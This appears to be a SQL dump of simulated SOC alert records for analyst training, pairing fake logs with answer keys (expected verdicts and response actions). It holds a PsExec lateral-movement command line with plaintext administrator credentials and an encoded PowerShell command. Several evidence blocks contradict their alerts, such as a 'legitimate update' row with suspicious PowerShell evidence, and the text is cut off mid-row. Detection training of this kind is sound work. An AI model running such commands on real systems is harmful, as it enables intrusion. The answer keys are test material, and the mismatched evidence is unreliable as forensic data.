(654, 'Lateral Movement Detected via PSExec', 'high', 'SIEM', 'Suspicious lateral movement detected using PSExec from an internal IP, indicating possible unauthorized access.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:50:37Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"administrator\",\"hostname\":\"server-02\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.30 -u administrator -p password cmd\"}', '2026-01-11 12:58:57', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP for lateral movement within network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.30 -u administrator -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec used in unauthorized lateral movement attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target IP for unauthorized access attempt\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec was used for lateral movement within the network, indicating potential unauthorized access.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:50:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server-02\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u administrator -p password cmd\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(655, 'Potential Data Exfiltration via FTP', 'high', 'Firewall', 'Unusual FTP traffic was detected, indicating possible unauthorized data transfer to an external IP.', 'Data Exfiltration', 'T1048', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:00:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"203.0.113.77\",\"username\":\"backupuser\",\"hostname\":\"backup-server\",\"domain\":\"ftp.example.com\"}', '2026-01-10 06:59:49', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in suspicious FTP traffic\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"ftp.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate FTP domain with no known issues\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the backup server\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is involved in suspicious FTP traffic, suggesting potential data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(656, 'DNS Tunneling Activity Detected', 'medium', 'IDS', 'Unusual DNS queries detected, possibly indicating DNS tunneling for data exfiltration or command and control.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:15:14Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.88\",\"username\":\"\",\"hostname\":\"\",\"domain\":\"suspicious-dns.example.com\"}', '2026-01-10 21:24:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspicious-dns.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for DNS tunneling and data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"IP associated with suspicious DNS traffic\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in DNS tunneling activity\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DNS queries to this domain are indicative of tunneling activity for data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.301Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:15:14Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.88\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"domain\\\":\\\"suspicious-dns.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(657, 'False Positive: Legitimate Software Update', 'low', 'EDR', 'A software update process was flagged as suspicious but verified to be a legitimate update from a trusted source.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T04:22:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"laptop-03\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 06:52:04', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash matches a known legitimate software update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process was flagged due to unusual execution patterns but verified as a legitimate update.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(658, 'False Positive: Unusual Login Time', 'medium', 'SIEM', 'A login event occurred at an unusual time for the user, but investigation revealed it was a legitimate access.', 'Credential Attack', 'T1078', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T05:10:10Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"\",\"username\":\"mjohnson\",\"hostname\":\"workstation-04\",\"failed_attempts\":0}', '2026-01-11 03:18:55', '2026-02-16 05:12:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mjohnson\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Employee account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was initially flagged due to the time but was confirmed as legitimate after user verification.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-02-01T20:31:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-02-01T20:30:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-02-01T20:29:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-02-01T20:28:22.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:10:10Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"workstation-04\\\",\\\"failed_attempts\\\":0}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(659, 'False Positive: High Volume Web Traffic', 'low', 'Firewall', 'An alert was triggered for high volume web traffic, which was determined to be legitimate business activity.', 'Web Attack', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T06:45:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.80\",\"dst_ip\":\"203.0.113.200\",\"username\":\"\",\"hostname\":\"\",\"domain\":\"business-partner.com\"}', '2026-01-09 15:07:34', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Trusted partner domain with no security issues\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of a business unit\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"business-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate business partner domain\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The traffic volume was high due to a scheduled data exchange with a business partner.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(660, 'Suspicious PowerShell Command with Encoded Payload', 'high', 'Splunk', 'A PowerShell script was executed using an encoded command, indicating possible obfuscation tactics.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.12\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-WIN12\",\"command_line\":\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\"}', '2026-01-09 15:31:43', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used for obfuscation by malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are a known indicator of malicious activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(661, 'Multiple Failed Login Attempts Detected', 'medium', 'Wazuh', 'A foreign IP address attempted to log in 23 times unsuccessfully, indicating a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.25\",\"username\":\"administrator\",\"hostname\":\"DC01\",\"failed_attempts\":23}', '2026-01-10 14:02:12', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common target for brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Frequent failed login attempts from a known malicious IP indicates a brute force attack.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"},{\"timestamp\":\"2026-02-01T20:31:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"},{\"timestamp\":\"2026-02-01T20:30:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"},{\"timestamp\":\"2026-02-01T20:29:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"},{\"timestamp\":\"2026-02-01T20:28:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"}],\"query\":\"index=main 